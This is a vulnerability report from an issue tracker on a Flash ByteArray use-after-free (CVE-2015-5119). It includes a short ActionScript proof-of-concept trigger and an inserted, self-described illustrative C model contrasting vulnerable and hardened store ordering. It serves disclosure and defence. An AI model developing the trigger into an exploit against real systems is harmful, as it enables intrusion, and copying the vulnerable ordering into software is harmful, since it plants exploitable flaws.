
Issue metadata

Status: Fixed
Closed: Jul 2015


Issue 472: Adobe Flash: Use-after-free in ByteArray Operator[]

Reported by, Jul 1 2015 Project Member

Issue description

There is a use-after-free in the ByteArray operator []. If a byte array index is set to a value with valueOf defined, this method gets called. If valueOf contains code that frees the array, such as setting its length, it will lead to a use-after-free, as the original ByteArray memory gets set as opposed to the newly allocated memory. A PoC is as follows:

		for(var i = 0; i < 1000; i++){
			var b = new ByteArray();
			b.length = 12;
			var n = new myba(b);
			b[0] = n;   // storing an object calls n.valueOf() before the byte is written
		}

In the myba class definition:

		prototype.valueOf = function()
		{
			b.length = 1000;   // reallocates b's backing store and frees the old buffer
			bb = new ByteArray();
			bb.length = 12;    // new 12-byte buffer allocated after b's old one was freed
			return 77;
		}

A swf and as files are attached.

This bug is subject to a 7 day disclosure deadline, as the issue is being exploited in the wild. If 7 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
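
As an added illustration (not code from this report, from the attached PoC, or from Adobe's Flash runtime), the C program below models the ordering bug the report describes: an indexed-store routine that captures the array's backing pointer before coercing the stored value, so that the valueOf() callback can free that buffer, is shown next to a hardened routine that coerces first and only then reads the array's current pointer and length. The slot-based toy allocator, the ByteArray and Value structs, and all function names are constructed for this model; it replays one iteration of the PoC loop and reports where the byte 77 actually lands.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Toy heap: fixed slots that are never unmapped, so a stale pointer can be
 * written through and inspected without undefined behaviour. The first free
 * slot is always handed out, which is what lets a fresh allocation reuse
 * memory that was just released (an assumption of this model, not AVM2's heap). */
#define SLOTS 8
#define SLOT_SIZE 4096
static uint8_t arena[SLOTS][SLOT_SIZE];
static int slot_live[SLOTS];

static void toy_reset(void) { memset(slot_live, 0, sizeof slot_live); }

static uint8_t *toy_alloc(size_t n) {
    if (n > SLOT_SIZE) return NULL;
    for (int i = 0; i < SLOTS; i++) {
        if (!slot_live[i]) {
            slot_live[i] = 1;
            memset(arena[i], 0, SLOT_SIZE);
            return arena[i];
        }
    }
    return NULL;
}

static void toy_free(uint8_t *p) {
    for (int i = 0; i < SLOTS; i++)
        if (p == arena[i]) slot_live[i] = 0;
}

/* Model of ByteArray: a backing buffer plus its length. */
typedef struct { uint8_t *data; size_t length; } ByteArray;

/* ByteArray.length = n: allocate a new buffer, copy, release the old one. */
static void bytearray_set_length(ByteArray *ba, size_t n) {
    uint8_t *fresh = toy_alloc(n);
    if (!fresh) { fputs("toy heap exhausted\n", stderr); return; }
    if (ba->data) {
        memcpy(fresh, ba->data, ba->length < n ? ba->length : n);
        toy_free(ba->data);
    }
    ba->data = fresh;
    ba->length = n;
}

/* A value being stored: a plain number, or an object whose valueOf() runs
 * script code before the number is produced. */
typedef struct Value { int number; int (*valueOf)(struct Value *self); } Value;

static int coerce_to_int(Value *v) { return v->valueOf ? v->valueOf(v) : v->number; }

/* Script-level b and bb from the report's PoC (constructed globals). */
static ByteArray g_b, g_bb;

/* Stands in for myba.prototype.valueOf: grow b (freeing its old buffer),
 * give bb a buffer of the old size, then hand back the number to store. */
static int myba_valueOf(Value *self) {
    (void)self;
    bytearray_set_length(&g_b, 1000);
    bytearray_set_length(&g_bb, 12);
    return 77;
}

/* Vulnerable ordering: pointer and length are captured, then the value is
 * coerced (running script), then the captured pointer is written through. */
int set_index_vulnerable(ByteArray *ba, size_t idx, Value *v) {
    uint8_t *buf = ba->data;
    size_t len = ba->length;
    if (idx >= len) return -1;
    int n = coerce_to_int(v);          /* may free buf and reallocate ba->data */
    buf[idx] = (uint8_t)n;             /* store through the stale pointer */
    return buf != ba->data;            /* 1: the store missed the live buffer */
}

/* Hardened ordering: run every script-visible conversion first, then read
 * the array's current pointer and length, bounds check, and store. */
int set_index_hardened(ByteArray *ba, size_t idx, Value *v) {
    int n = coerce_to_int(v);
    if (idx >= ba->length) return -1;  /* re-validate against current state */
    ba->data[idx] = (uint8_t)n;
    return 0;
}

typedef struct { int stale; int b_first; int bb_first; } Outcome;

/* Replays one iteration of the PoC loop against either store routine. */
Outcome run_scenario(int hardened) {
    Outcome o = {0, 0, 0};
    toy_reset();
    g_b.data = NULL;  g_b.length = 0;
    g_bb.data = NULL; g_bb.length = 0;
    bytearray_set_length(&g_b, 12);          /* b = new ByteArray(); b.length = 12 */
    Value n = { 0, myba_valueOf };           /* n = new myba(b) */
    o.stale = hardened ? set_index_hardened(&g_b, 0, &n)
                       : set_index_vulnerable(&g_b, 0, &n);   /* b[0] = n */
    o.b_first = g_b.data[0];
    o.bb_first = g_bb.data ? g_bb.data[0] : -1;
    return o;
}

int main(void) {
    Outcome v = run_scenario(0), h = run_scenario(1);
    printf("vulnerable: stale=%d b[0]=%d bb[0]=%d\n", v.stale, v.b_first, v.bb_first);
    printf("hardened:   stale=%d b[0]=%d bb[0]=%d\n", h.stale, h.b_first, h.bb_first);
    return 0;
}
```

Built with any C99 compiler, the vulnerable path reports stale=1 and the 77 ends up in bb's buffer while b[0] stays 0, which is the "original ByteArray memory gets set" outcome the report describes; the hardened path puts 77 in b and leaves bb untouched. The review pattern this demonstrates for native code exposed to script is the one the fix needs: perform all script-visible conversions before holding any raw pointer into an object the script can reach, and re-check the length after they return.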

Comment 1 by, Jul 5 2015

Labels: CVE-2015-5119

Comment 2 by, Jul 9 2015

Labels: -Restrict-View-Commit Fixed-2015-Jul-8
Status: Fixed
